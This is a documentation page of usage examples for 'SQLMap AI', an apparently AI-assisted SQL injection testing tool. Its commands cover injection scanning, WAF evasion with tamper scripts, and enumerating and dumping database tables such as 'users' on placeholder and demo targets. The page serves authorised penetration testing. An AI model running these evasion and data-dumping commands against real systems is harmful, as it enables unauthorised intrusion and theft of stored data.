Basic Examples
This page contains practical examples of using SQLMap AI for SQL injection testing. These examples range from simple to advanced scenarios.
Example 1: Basic URL Testing
Simple GET Parameter Test
Test a basic URL with GET parameters:
Expected Output:
🚀 SQLMap AI - AI-Powered SQL Injection Testing
================================================
📋 Target Information:
URL: http://testphp.vulnweb.com/listproducts.php?cat=1
Method: GET
Parameter: cat
🤖 AI Provider: Groq (Auto-selected)
🔄 Starting Enhanced Mode...
├─ Initial Assessment: Checking for SQL injection vulnerabilities
├─ DBMS Identification: Detecting database type
├─ Enhanced Testing: Applying advanced techniques
└─ AI Analysis: Generating insights and recommendations
✅ Results:
├─ Vulnerable Parameters: cat (GET)
├─ DBMS: MySQL >= 5.6
├─ Techniques: Boolean-based blind, time-based blind
└─ Risk Level: HIGH
Multiple Parameter Testing
Test URLs with multiple parameters:
# Test all parameters
sqlmap-ai -u "http://example.com/search.php?query=test&category=1&sort=name"
# Test specific parameters only
sqlmap-ai -u "http://example.com/search.php?query=test&category=1" --param-exclude=sort
Example 2: Request File Testing
POST Request Testing
Test using a captured HTTP request:
Request File Content (login_request.txt):
POST /login.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

username=admin&password=test
JSON Request Testing
Test POST requests with JSON data:
Request File Content (api_request.txt):
POST /api/search HTTP/1.1
Host: api.example.com
Content-Type: application/json
Content-Length: 43

{"query": "test", "limit": 10, "offset": 0}
Example 3: AI Provider Selection
Using Specific AI Provider
# Use Groq (fastest)
sqlmap-ai -u "http://example.com/page.php?id=1" --ai-provider groq
# Use OpenAI
sqlmap-ai -u "http://example.com/page.php?id=1" --ai-provider openai
# Use Anthropic (Claude)
sqlmap-ai -u "http://example.com/page.php?id=1" --ai-provider anthropic
# Use Ollama (local)
sqlmap-ai -u "http://example.com/page.php?id=1" --ai-provider ollama
Ollama with Specific Model
# Use specific Ollama model
sqlmap-ai -u "http://example.com/page.php?id=1" \
--ai-provider ollama \
--ollama-model codellama
Example 4: Testing Modes
Enhanced Mode (Default)
# Full AI-powered testing
sqlmap-ai --enhanced -u "http://example.com/page.php?id=1"
# With request file
sqlmap-ai --enhanced -r request.txt
Simple Mode
# Basic SQLMap without AI
sqlmap-ai --simple -u "http://example.com/page.php?id=1"
# Quick batch mode
sqlmap-ai --simple -r request.txt --batch
Adaptive Mode
# Intelligent step-by-step testing
sqlmap-ai --adaptive -u "http://example.com/page.php?id=1"
# With specific AI provider
sqlmap-ai --adaptive -r request.txt --ai-provider groq
Example 5: Advanced Testing Options
Custom Risk and Level
# High-risk, high-level testing
sqlmap-ai -u "http://example.com/page.php?id=1" \
--risk 3 \
--level 5 \
--threads 10
Timeout and Performance
# Set custom timeout and threads
sqlmap-ai -u "http://example.com/page.php?id=1" \
--timeout 60 \
--threads 8 \
--max-retries 3
Output and Reporting
# Save results to specific directory
sqlmap-ai -u "http://example.com/page.php?id=1" \
--output-dir ./my_results \
--html-report \
--verbose
Example 6: Authentication Testing
Session-Based Authentication
# Test with session cookie
sqlmap-ai -u "http://example.com/admin.php" \
--cookie="session=abc123; user=admin"
Header-Based Authentication
# Test with authorization header
sqlmap-ai -r request.txt \
--headers="Authorization: Bearer token123"
Form-Based Authentication
Example 7: WAF Evasion
Basic WAF Evasion
# Enable WAF evasion techniques
sqlmap-ai -u "http://example.com/page.php?id=1" \
--tamper=space2comment,randomcase
Advanced WAF Evasion
# Multiple tamper scripts
sqlmap-ai -u "http://example.com/page.php?id=1" \
--tamper=space2comment,randomcase,space2plus \
--random-agent \
--hpp
Example 8: Data Extraction
Database Enumeration
# List databases
sqlmap-ai -u "http://example.com/page.php?id=1" \
--dbs \
--batch
# List tables
sqlmap-ai -u "http://example.com/page.php?id=1" \
-D acuart \
--tables \
--batch
# List columns
sqlmap-ai -u "http://example.com/page.php?id=1" \
-D acuart \
-T users \
--columns \
--batch
Data Dumping
# Dump specific table
sqlmap-ai -u "http://example.com/page.php?id=1" \
-D acuart \
-T users \
--dump \
--batch
# Dump with conditions
sqlmap-ai -u "http://example.com/page.php?id=1" \
-D acuart \
-T users \
--where="id=1" \
--dump
Example 9: Batch Testing
Multiple URLs
# Test multiple URLs
sqlmap-ai -m urls.txt --batch
# URLs file content (urls.txt):
# http://example.com/page1.php?id=1
# http://example.com/page2.php?id=1
# http://example.com/page3.php?id=1
Multiple Request Files
# Test multiple request files
for file in requests/*.txt; do
    # Quote "$file" so request file names containing spaces are handled correctly
    sqlmap-ai -r "$file" --batch --output-dir "./results/$(basename "$file" .txt)"
done
Example 10: Integration Examples
With Burp Suite
- Capture request in Burp Suite
- Save as .txt file
- Test with SQLMap AI:
With OWASP ZAP
- Export request from ZAP
- Test with SQLMap AI:
With Browser Developer Tools
- Open Developer Tools (F12)
- Go to Network tab
- Copy request as cURL
- Convert to HTTP format
- Test with SQLMap AI:
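For the "Convert to HTTP format" step above, the following Python helper turns a browser "Copy as cURL" command into a raw request file with a regenerated Host header and Content-Length. It is an added example, not part of SQLMap AI or its documentation; the function name `curl_to_raw_request` and the sample command are constructed for illustration, and only the common curl flags listed in the code are handled.

```python
import shlex
from urllib.parse import urlsplit

# Constructed sample of a browser "Copy as cURL" command (not from the page).
SAMPLE = """curl 'http://example.com/login.php' \\
  -H 'Content-Type: application/x-www-form-urlencoded' \\
  --data-raw 'username=admin&password=test' \\
  --compressed"""

HEADER_FLAGS = {"-H", "--header"}
DATA_FLAGS = {"-d", "--data", "--data-raw", "--data-binary"}
METHOD_FLAGS = {"-X", "--request"}
COOKIE_FLAGS = {"-b", "--cookie"}


def curl_to_raw_request(curl_cmd: str) -> str:
    """Hypothetical helper: build a raw HTTP/1.1 request from a curl command."""
    # Join backslash-continued lines, then tokenize the way a POSIX shell does.
    tokens = shlex.split(curl_cmd.replace("\\\n", " "))
    if not tokens or tokens[0] != "curl":
        raise ValueError("not a curl command")
    method, url, body, headers = None, None, None, []
    it = iter(tokens[1:])
    for tok in it:
        if tok in HEADER_FLAGS:
            headers.append(next(it))
        elif tok in DATA_FLAGS:
            body = next(it)
        elif tok in METHOD_FLAGS:
            method = next(it).upper()
        elif tok in COOKIE_FLAGS:
            headers.append("Cookie: " + next(it))
        elif tok.startswith(("http://", "https://")):
            url = tok
        # Anything else (e.g. --compressed) is ignored in this sketch.
    if url is None:
        raise ValueError("no URL found")
    parts = urlsplit(url)
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    method = method or ("POST" if body is not None else "GET")
    # Host and Content-Length are regenerated so stale values never survive.
    keep = [h for h in headers
            if h.split(":", 1)[0].strip().lower() not in ("host", "content-length")]
    lines = [f"{method} {path} HTTP/1.1", f"Host: {parts.netloc}", *keep]
    if body is not None:
        lines.append(f"Content-Length: {len(body.encode('utf-8'))}")
    # The blank line separating headers from body is mandatory.
    return "\r\n".join(lines) + "\r\n\r\n" + (body or "")
```

Write the returned string to a file such as request.txt and pass it with `-r`, as in the request-file examples on this page.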
Example 11: Error Handling
Graceful Error Handling
# Continue on errors
sqlmap-ai -u "http://example.com/page.php?id=1" \
--force \
--batch \
--max-retries 5
Verbose Output for Debugging
# Get detailed output
sqlmap-ai -u "http://example.com/page.php?id=1" \
--verbose \
--debug \
--output-dir ./debug_results
Example 12: Real-World Scenarios
E-commerce Site Testing
# Test product search
sqlmap-ai -r product_search.txt \
--enhanced \
--ai-provider groq \
--output-dir ./ecommerce_results
Admin Panel Testing
API Testing
# Test REST API
sqlmap-ai -r api_endpoint.txt \
--enhanced \
--ai-provider openai \
--headers="Content-Type: application/json"
Best Practices
1. Start Simple
# Always start with simple mode
sqlmap-ai --simple -u "http://example.com/page.php?id=1"
# Then try enhanced mode
sqlmap-ai --enhanced -u "http://example.com/page.php?id=1"
2. Use Request Files
3. Save Results
# Always save your results
sqlmap-ai -u "http://example.com/page.php?id=1" \
--output-dir ./results \
--html-report
4. Monitor Resources
# Use reasonable thread limits
sqlmap-ai -u "http://example.com/page.php?id=1" \
--threads 5 \
--timeout 30
Next Steps
After trying these examples:
- Advanced Examples: Explore more complex scenarios
- Real-world Scenarios: See practical use cases
- Testing Modes: Learn about different testing approaches
- Request Files: Master request file testing